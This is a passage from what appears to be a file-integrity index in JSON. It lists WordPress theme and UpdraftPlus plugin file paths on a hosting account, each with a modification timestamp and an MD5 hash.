z\\/public_html\\/bintara.com.my\\/wp-content\\/themes\\/onepress\\/section-parts\\/section-features.php\":{\"d\":1545792532,\"h\":\"fb932d0efc760c7640d922630deff74d\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/themes\\/onepress\\/section-parts\\/section-team.php\":{\"d\":1545792532,\"h\":\"d03008b0659c04f44900df2a452a676f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/themes\\/onepress\\/single.php\":{\"d\":1545792530,\"h\":\"91e03a35ed9bb02a39838a2d1da32568\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/themes\\/onepress\\/wpml-config.xml\":{\"d\":1545792532,\"h\":\"844b2d909541ee223f81a2c741102b72\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/themes\\/onepress\\/woocommerce.php\":{\"d\":1545792532,\"h\":\"d7341521986a5ff67eeb377544adba64\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/themes\\/onepress\\/error_log\":{\"d\":1545961733,\"h\":\"ad69e46b7bb80cd9f13657715ff851fb\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/themes\\/onepress\\/search.php\":{\"d\":1545792532,\"h\":\"90c5a89956a8e7b064949f084b64bf3a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/themes\\/onepress\\/comments.php\":{\"d\":1545792532,\"h\":\"ac67caaea572fc5ddf2e0618e1612d8e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/themes\\/onepress\\/functions.php\":{\"d\":1545792532,\"h\":\"b2d65cc890285fa044b5890c3d6ba0a7\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/themes\\/onepress\\/style.css\":{\"d\":1545792532,\"h\":\"2956dd0f30d71bb10a1e4404494a860f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/themes\\/onepress\\/template-left-sidebar.php\":{\"d\":1545792532,\"h\":\"4eac01af5d49e052d0631e057b2ada99\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/themes\\/onepress\\/archive.php\":{\"d\":1545792532,\"h\":\"66eabad2949312dff0639d03767ca2cc\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/themes\\/onepress\\/template-fullwidth-stretched.php\":{\"d\":1545792532,\"h\":\"5c1e6dc67edc5b081b36b3b914414fee\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/themes\\/onepress\\/editor-style.css\":{\"d\":1545792532,\"h\":\"aa47ee37fcff86fe4df9a8ea234a7a59\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/themes\\/onepress\\/rtl.css\":{\"d\":1545792532,\"h\":\"6799a8cc2e28faefaf1f0af2d97b7d26\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/themes\\/onepress\\/404.php\":{\"d\":1545792532,\"h\":\"b55684bbfc38c273f72a11d08d1e4db7\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/themes\\/onepress\\/template-frontpage.php\":{\"d\":1545792532,\"h\":\"49df267ecaf7ad63890656889614d6c3\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/themes\\/onepress\\/index.php\":{\"d\":1545792532,\"h\":\"5235a102bc84769bb5025bbb5eed6cd5\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/themes\\/onepress\\/sidebar.php\":{\"d\":1545792532,\"h\":\"0182905928d5206b8962d4434c451238\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/themes\\/onepress\\/header.php\":{\"d\":1545792532,\"h\":\"a4ba2f253643d8cd9348fbec25745aa3\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/themes\\/onepress\\/template-fullwidth.php\":{\"d\":1545792532,\"h\":\"ded3ec1ac5279a261a863cf71ba578eb\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/themes\\/onepress\\/readme.txt\":{\"d\":1545792532,\"h\":\"309b8fee851e5a2cae3f2670bfdbf1e1\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/themes\\/onepress\\/changelog.md\":{\"d\":1545792532,\"h\":\"7d60ad6fc6c1c7a624f83e91f439730e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/themes\\/onepress\\/home.php\":{\"d\":1545792532,\"h\":\"763381224bca1605558f9f010f7169c8\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/themes\\/onepress\\/page.php\":{\"d\":1545792532,\"h\":\"1cc7da1dbc4ebf45ba90e99c1030dedd\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/themes\\/onepress\\/footer.php\":{\"d\":1545792532,\"h\":\"f353c381a2320fc7e1150362a9a71eb4\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/themes\\/index.php\":{\"d\":1401974954,\"h\":\"67442c5615eba73d105c0715c6620850\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/central\\/classes\\/class-automatic-upgrader-skin.php\":{\"d\":1545638143,\"h\":\"92179d900c24a9e1e0f723bfdc370cfd\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/central\\/modules\\/plugin.php\":{\"d\":1545638143,\"h\":\"fb8909f65749dbdc5ebe549814a957e3\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/central\\/modules\\/analytics.php\":{\"d\":1545638143,\"h\":\"f3f1300f8dbb58ff8e40d321d11b967e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/central\\/modules\\/posts.php\":{\"d\":1545638143,\"h\":\"d902cfc29ae6e90d5825c0e283dcf537\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/central\\/modules\\/comments.php\":{\"d\":1545638143,\"h\":\"e65553e20d0c149e9f31be884696661c\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/central\\/modules\\/users.php\":{\"d\":1545638143,\"h\":\"77bd762789d948c7ec3a8c126a5081f0\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/central\\/modules\\/theme.php\":{\"d\":1545638143,\"h\":\"5dd301358821686d3b5c1aad805eaa45\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/central\\/modules\\/core.php\":{\"d\":1545638143,\"h\":\"34d21fda8549d318c4c352d469787995\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/central\\/modules\\/updates.php\":{\"d\":1545638143,\"h\":\"e011065875b9f1ef006cfddc2a59189e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/central\\/listener.php\":{\"d\":1545638143,\"h\":\"de603005912f636754b8db4bf7a10f75\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/central\\/bootstrap.php\":{\"d\":1545638143,\"h\":\"287e7da6dc5d0a5eec00dcad2e364ac2\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/central\\/commands.php\":{\"d\":1545638143,\"h\":\"65b5249816da8e39db7bfaa9833169ae\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/methods\\/sftp.php\":{\"d\":1545638143,\"h\":\"02008158830b7417b4f6e9ab490fb0b6\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/methods\\/openstack2.php\":{\"d\":1545638143,\"h\":\"c4b514a9d6ebcc47bca0d079152a84e1\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/methods\\/dreamobjects.php\":{\"d\":1545638143,\"h\":\"dc7d82fa95f8066818835c285eae4143\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/methods\\/webdav.php\":{\"d\":1545638143,\"h\":\"a923a796820ce30b912bb8bc98fe3bcd\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/methods\\/dropbox.php\":{\"d\":1545638143,\"h\":\"8358a0cb82c72feba72de6f2b232a5e4\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/methods\\/addon-not-yet-present.php\":{\"d\":1545638143,\"h\":\"309e3befa3d883e07862ba1cb04d87a3\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/methods\\/backup-module.php\":{\"d\":1545638143,\"h\":\"f38198e2f929fa0842ab93d506ab244b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/methods\\/addon-base-v2.php\":{\"d\":1545638143,\"h\":\"9a33682e0414f0f6087c3c26ecc6a0e7\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/methods\\/remotesend.php\":{\"d\":1545638143,\"h\":\"b7ec10fb7162135841b5a52d5d881127\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/methods\\/s3.php\":{\"d\":1545638143,\"h\":\"5c8269f07a40c5ac7326620c99e31119\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/methods\\/cloudfiles.php\":{\"d\":1545638143,\"h\":\"2f9e64b2b40b6b3fb09c3ab53e580270\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/methods\\/ftp.php\":{\"d\":1545638143,\"h\":\"0a4e44308fc48ff43533c95620dc2ebf\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/methods\\/onedrive.php\":{\"d\":1545638143,\"h\":\"121facd9c0506bb874aafe7252fad911\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/methods\\/cloudfiles-new.php\":{\"d\":1545638143,\"h\":\"d78c716a193ece4fca313f83c01d6b4d\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/methods\\/template.php\":{\"d\":1545638143,\"h\":\"94b075f387b5ce3d6c17afd4b0c31f9a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/methods\\/email.php\":{\"d\":1545638147,\"h\":\"b03c5cf202155b3d11dc70f35aa481d6\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/methods\\/s3generic.php\":{\"d\":1545638147,\"h\":\"7c915964742ed827cc13ecd154b895da\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/methods\\/googledrive.php\":{\"d\":1545638147,\"h\":\"dc8dfc7fa623be4351c13bb27aaf3401\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/methods\\/openstack.php\":{\"d\":1545638147,\"h\":\"4ccdcded69d8c09297387b7615fd61af\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/methods\\/googlecloud.php\":{\"d\":1545638147,\"h\":\"e7d4ba1727ae1e1e801e687af1f278a2\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/methods\\/insufficient.php\":{\"d\":1545638147,\"h\":\"d22ebf2463d7d657823f1b3a3de0195e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/methods\\/backblaze.php\":{\"d\":1545638147,\"h\":\"917e8da055c59d1a7aa9d75da6909a98\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/methods\\/openstack-base.php\":{\"d\":1545638147,\"h\":\"b1f8e7e3049bd97abb092a1aade21de7\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/methods\\/updraftvault.php\":{\"d\":1545638147,\"h\":\"95550954c7351b8968c348268ee4a201\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/methods\\/azure.php\":{\"d\":1545638147,\"h\":\"6b39329968c8cefc6ec54913a0c25608\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/css\\/tether-shepherd\\/shepherd-theme-square.min.css\":{\"d\":1545638147,\"h\":\"072228e80f040521ca235fe0dac32c9d\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/css\\/tether-shepherd\\/shepherd-theme-arrows.css\":{\"d\":1545638147,\"h\":\"7917e1d31da2ef4c80fbb55a58e41aa8\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/css\\/tether-shepherd\\/shepherd-theme-square.css\":{\"d\":1545638147,\"h\":\"168fe8f091b41200886eef14584a4b77\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/css\\/tether-shepherd\\/shepherd-theme-default.min.css\":{\"d\":1545638147,\"h\":\"307a6fb35913d7a8ef4550fae77c07b4\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/css\\/tether-shepherd\\/shepherd-theme-arrows-plain-buttons.css\":{\"d\":1545638147,\"h\":\"6dea7ca19d2c3e2ecb9e94e650c51d40\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/css\\/tether-shepherd\\/shepherd-theme-arrows.min.css\":{\"d\":1545638147,\"h\":\"73e3728aa233fb9df525d71217321a25\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/css\\/tether-shepherd\\/shepherd-theme-dark.css\":{\"d\":1545638147,\"h\":\"f63f1659ef9069c53917587fc40270a0\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/css\\/tether-shepherd\\/shepherd-theme-square-dark.min.css\":{\"d\":1545638147,\"h\":\"ed1092ead7949c4c68528ead7882f8c3\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/css\\/tether-shepherd\\/shepherd-theme-arrows-fix.css\":{\"d\":1545638147,\"h\":\"5ea33d242810961cd664b523eeda66b1\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/css\\/tether-shepherd\\/shepherd-theme-dark.min.css\":{\"d\":1545638147,\"h\":\"f9b352255bb729746c55f9877f193f2f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/css\\/tether-shepherd\\/shepherd-theme-arrows-plain-buttons.min.css\":{\"d\":1545638147,\"h\":\"7832bd1019ef943499539dc25bd14371\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/css\\/tether-shepherd\\/shepherd-theme-arrows-fix.min.css\":{\"d\":1545638147,\"h\":\"37cf62829704c84b2de49fdf55761c6b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/css\\/tether-shepherd\\/shepherd-theme-square-dark.css\":{\"d\":1545638147,\"h\":\"0cf0d1ab642166a0de37f6df7cecbcda\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/css\\/tether-shepherd\\/shepherd-theme-default.css\":{\"d\":1545638147,\"h\":\"bb99d5824eda83a886069b129a01248b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/css\\/updraftplus-admin.min.css\":{\"d\":1545638147,\"h\":\"cbfd45ebf42f6dabe5a4c6a86aa45edf\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/css\\/updraftplus-tour.css\":{\"d\":1545638147,\"h\":\"5398566df7b43ae8ebeb53dc4055495b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/css\\/updraftplus-tour.scss\":{\"d\":1545638147,\"h\":\"61b76daf84d997c942b1e8a1996a6504\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/css\\/updraftplus-admin.min.css.map\":{\"d\":1545638147,\"h\":\"fabe46cfabdabd82f7ba2254b7f0e21d\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/css\\/updraftplus-notices.css\":{\"d\":1545638147,\"h\":\"b1b0e473e520f27c9a66812ec2db7e43\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/css\\/updraftplus-notices.min.css.map\":{\"d\":1545638147,\"h\":\"6ef840856067547b1f079398964ce409\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/css\\/updraftplus-tour.min.css\":{\"d\":1545638147,\"h\":\"4bff36f2ee3b4c2ae20a95ce8cf9d6de\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/css\\/updraftplus-admin.css\":{\"d\":1545638147,\"h\":\"3a63ed765962ea056af82d7a9ec21e67\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/css\\/updraftplus-tour.min.css.map\":{\"d\":1545638147,\"h\":\"8426bac689317c95ec306fb7cae71275\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/css\\/updraftplus-notices.min.css\":{\"d\":1545638147,\"h\":\"2fc9d9ac7c9f8fc2db62ed120533803b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/languages\\/updraftplus.pot\":{\"d\":1545638155,\"h\":\"31ee472dda3da9b99856cf1bfe1605f3\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/includes\\/handlebars\\/LICENSE\":{\"d\":1545638159,\"h\":\"ce18aa31fdaf5dc94665aee755ed2ef3\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/includes\\/handlebars\\/handlebars.runtime.min.js\":{\"d\":1545638159,\"h\":\"16e2e0cebfa28fe5c6e8a21061ba26d0\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/includes\\/handlebars\\/handlebars.js\":{\"d\":1545638159,\"h\":\"a595b4caaa283986188ca20e206e988e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/includes\\/handlebars\\/handlebars.min.js\":{\"d\":1545638159,\"h\":\"f9b85ec8a458762b6eef7285cb6a99a8\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/includes\\/handlebars\\/handlebars.runtime.js\":{\"d\":1545638159,\"h\":\"c8f6c4fc44ae624ff155ec8fc822b569\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/includes\\/labelauty\\/jquery-labelauty.min.css.map\":{\"d\":1545638159,\"h\":\"1409aa8ca6b4ba12f93bc89f1a02aa32\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/includes\\/labelauty\\/jquery-labelauty.min.css\":{\"d\":1545638159,\"h\":\"19d1ac805ac0a5ffd65db9edb11fc863\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/includes\\/labelauty\\/LICENSE\":{\"d\":1545638159,\"h\":\"76a1caf2a5780dfbf061206d2e5552d6\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/includes\\/labelauty\\/jquery-labelauty.js\":{\"d\":1545638159,\"h\":\"afc2aa2f0f8b39b60cf15408bba43949\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/includes\\/labelauty\\/jquery-labelauty.css\":{\"d\":1545638159,\"h\":\"4d0b30e488acbdf1248e545ec8ae1fb8\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/includes\\/labelauty\\/jquery-labelauty.min.js\":{\"d\":1545638159,\"h\":\"a8148121ef6d95b9cfd4484034d9a8a6\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/includes\\/Dropbox2\\/OAuth\\/Consumer\\/WordPress.php\":{\"d\":1545638159,\"h\":\"f073eb791f9771f4465754e60dd2aea7\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/includes\\/Dropbox2\\/OAuth\\/Consumer\\/Curl.php\":{\"d\":1545638159,\"h\":\"3698100cffb38c8d22b878ce46e1a9e3\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/includes\\/Dropbox2\\/OAuth\\/Consumer\\/ConsumerAbstract.php\":{\"d\":1545638159,\"h\":\"03ee65c4e1da3b4c75a9887a3c768df6\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/includes\\/Dropbox2\\/OAuth\\/Storage\\/WordPress.php\":{\"d\":1545638159,\"h\":\"71832ced53058394b7ebb398d68021f9\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/includes\\/Dropbox2\\/OAuth\\/Storage\\/Encrypter.php\":{\"d\":1545638159,\"h\":\"8a2804a52b29d90528e253a04f99675c\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/includes\\/Dropbox2\\/OAuth\\/Storage\\/StorageInterface.php\":{\"d\":1545638159,\"h\":\"1057e362be03b3a5efdd5cd011a2e339\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/includes\\/Dropbox2\\/Exception.php\":{\"d\":1545638159,\"h\":\"d7559e24f9c961662aec196fb76e9f97\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/includes\\/Dropbox2\\/API.php\":{\"d\":1545638159,\"h\":\"9a032f6babfa3d9ba82b15cb31985988\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/includes\\/jstree\\/themes\\/default-dark\\/style.css\":{\"d\":1545638163,\"h\":\"e8a39068be6d8a48b48f160f5ecf7104\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/includes\\/jstree\\/themes\\/default-dark\\/style.min.css\":{\"d\":1545638163,\"h\":\"5af969c5031a532266f6fa40ff4a16f6\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/includes\\/jstree\\/themes\\/default\\/style.css\":{\"d\":1545638163,\"h\":\"8fce84b55253731c6c4209c011c7a5d2\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/includes\\/jstree\\/themes\\/default\\/style.min.css\":{\"d\":1545638163,\"h\":\"779fc4b400d1748ec2fb99685ad80550\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/includes\\/jstree\\/jstree.min.js\":{\"d\":1545638159,\"h\":\"60e8b824471fc9f08f948f7dce834cba\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/includes\\/jstree\\/jstree.js\":{\"d\":1545638163,\"h\":\"9c5fd7680b6c205ef0d84938a714863c\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/includes\\/updraftclone\\/temporary-clone-status.php\":{\"d\":1545638163,\"h\":\"3fcdb48fd196a64908a6bb078c43e3ca\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/includes\\/updraftclone\\/temporary-clone-auto-login.php\":{\"d\":1545638163,\"h\":\"1133be9dce209b2f0be066211e9f23d1\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/includes\\/updraftclone\\/temporary-clone-user-notice.php\":{\"d\":1545638163,\"h\":\"d5b32a63acb2cbc69e9e9a8fe4a8b00c\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/includes\\/updraftclone\\/temporary-clone-dash-notice.php\":{\"d\":1545638163,\"h\":\"dcc378c41590357636e633f47ebf6781\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/includes\\/updraftclone\\/temporary-clone-restore.php\":{\"d\":1545638163,\"h\":\"a79153c99141dd4df143f16737edf3f4\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/includes\\/jquery.serializeJSON\\/jquery.serializejson.js\":{\"d\":1545638163,\"h\":\"e6e67bacb353416b287584498f35730c\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/includes\\/jquery.serializeJSON\\/jquery.serializejson.min.js\":{\"d\":1545638163,\"h\":\"2dcfa33b47692472479639bc916324e8\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/includes\\/cloudfiles\\/cloudfiles.php\":{\"d\":1545638163,\"h\":\"c0f6c3cff29889b1239071d57e8be04f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/includes\\/cloudfiles\\/cloudfiles_http.php\":{\"d\":1545638163,\"h\":\"26a3ab67b1ebbf4b6443febf2ec4b526\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/includes\\/cloudfiles\\/cloudfiles_exceptions.php\":{\"d\":1545638163,\"h\":\"767f8f21116528aa69e59b3a68d75aa7\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/includes\\/tether-shepherd\\/shepherd.js\":{\"d\":1545638163,\"h\":\"9a809c5c2654858fbe1b2b1edbff4be6\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/includes\\/tether-shepherd\\/shepherd.min.js\":{\"d\":1545638163,\"h\":\"84d0dbf9d50a2b62417c992df5d3581e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/includes\\/tether-shepherd\\/LICENSE\":{\"d\":1545638163,\"h\":\"42463d89c79106c147853a0ac5f149cb\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/includes\\/tether-shepherd\\/tether.js\":{\"d\":1545638163,\"h\":\"d9ac4d5536d02f9efbcde041fc311cde\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/includes\\/tether\\/LICENSE\":{\"d\":1545638163,\"h\":\"e218d81ad870e5fcd8a504baa319cb69\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/includes\\/tether\\/tether.min.js\":{\"d\":1545638163,\"h\":\"7804d8ba8c54ef6538006d63803c23e1\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/includes\\/tether\\/tether.js\":{\"d\":1545638163,\"h\":\"4085f67a3c173d30b2577843ca20a609\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/includes\\/Google\\/Utils\\/URITemplate.php\":{\"d\":1545638163,\"